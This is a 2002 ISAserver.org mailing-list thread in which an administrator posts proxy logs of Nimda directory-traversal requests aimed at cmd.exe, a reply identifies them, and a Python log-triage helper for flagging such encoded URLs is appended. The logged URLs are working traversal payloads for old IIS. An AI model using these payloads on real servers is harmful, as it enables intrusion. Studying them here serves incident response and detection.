Re: ISA logs.

  • From: "Jim Harrison" <jim@xxxxxxxxxxxx>
  • To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
  • Date: Tue, 26 Feb 2002 06:33:17 -0800

Those are Nimda requests.
Since the sc-result code is 401 for all of them, it appears that ISA may be
allowing them to pass.
"401" could be coming from ISA or the IIS service.
What entries do you find in the IIS logs?

Jim Harrison
MCP(NT4, W2K), A+, Network+, PCG
http://isaserver.org/authors/harrison/
Read the books!

----- Original Message -----
From: "Vinaykumar G" <G.Vinay@xxxxxxxxx>
To: "[ISAserver.org Discussion List]" <isalist@xxxxxxxxxxxxx>
Sent: Sunday, February 24, 2002 19:44
Subject: [isalist] ISA logs.




Hi Jim,
       This is what I am getting in the ISA logs, and I have used
xxx.xxx.xx.xx to denote some valid IP on the Internet. If the IP is a
valid one on the Internet, then these scripts are coming from the Internet.
Please confirm what has to be done to stop these scripts from being executed.

xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:04
w3proxy ISA - www - - - 145 3518 http
TCP GET
http://www/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c.
./winnt/system32/cmd.exe?/c+dir - - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:06
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:08
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N 2002-02-23 05:57:08 w3proxy
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:10
w3proxy ISA - www - - - 97 3518 http
TCP GET http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
- - Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) Fetch API
Request N 2002-02-23 05:57:11 w3proxy anonymous
- N 2002-02-23 05:57:11 w3proxy ISA - www
- - - 97 3518 http TCP GET
http://www/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir - -
401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:13
w3proxy ISA - www - - - 98 3518 http
TCP GET http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:15
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
- - 401 - - -
-
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:17
w3proxy ISA - www - - - 100 3518 http
TCP GET
http://www/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir - -
401 - - -
xxx.xxx.xx.xx anonymous - N 2002-02-23 05:57:19
w3proxy ISA - www - - - 96 3518 http
TCP GET http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir
- - 401 - - -

Regards,
vinay.
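
Added example, not part of the original thread: a small Python triage helper that canonicalizes request URLs like the ones logged above, so nested percent-encoding and overlong two-byte sequences can be flagged when reviewing proxy or IIS logs. The function names and the benign sample URL are constructed for illustration, and the folding rule for the `%c0`/`%c1` sequences is an assumption about how a permissive decoder behaves.

```python
import re
from urllib.parse import unquote_to_bytes

OVERLONG = re.compile(rb"([\xc0\xc1])(.)", re.S)  # lead bytes never valid in UTF-8
TRAVERSAL = re.compile(rb"\.\.[/\\]")

# Three URLs as they appear in the quoted log, plus one constructed benign URL.
SAMPLE_URLS = [
    "http://www/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%252f../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir",
    "http://www/scripts/report.asp?id=42",  # constructed
]

def normalize(url, max_rounds=5):
    """Undo nested percent-encoding, then fold overlong 2-byte sequences.

    Returns (canonical_bytes, decode_rounds, saw_overlong).
    """
    data, rounds = url.encode("latin-1", "replace"), 0
    for _ in range(max_rounds):
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    saw_overlong = OVERLONG.search(data) is not None
    # Assumption: fold the way a permissive decoder would, masking the low
    # six bits of the second byte without checking that it is 10xxxxxx.
    data = OVERLONG.sub(
        lambda m: bytes([(m[1][0] & 0x1F) << 6 | (m[2][0] & 0x3F)]), data)
    return data, rounds, saw_overlong

def findings(url):
    """List the reasons a logged URL deserves a closer look (empty if none)."""
    data, rounds, saw_overlong = normalize(url)
    out = []
    if rounds > 1:
        out.append("nested-percent-encoding")
    if saw_overlong:
        out.append("overlong-utf8")
    if TRAVERSAL.search(data):
        out.append("directory-traversal")
    if b"cmd.exe" in data.lower():
        out.append("cmd.exe-target")
    return out

if __name__ == "__main__":
    for u in SAMPLE_URLS:
        print(findings(u), u)
```

A non-empty result only says the request was malformed in one of these ways; whether it was blocked still has to be read from the result code and the IIS log, as asked in the reply above.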

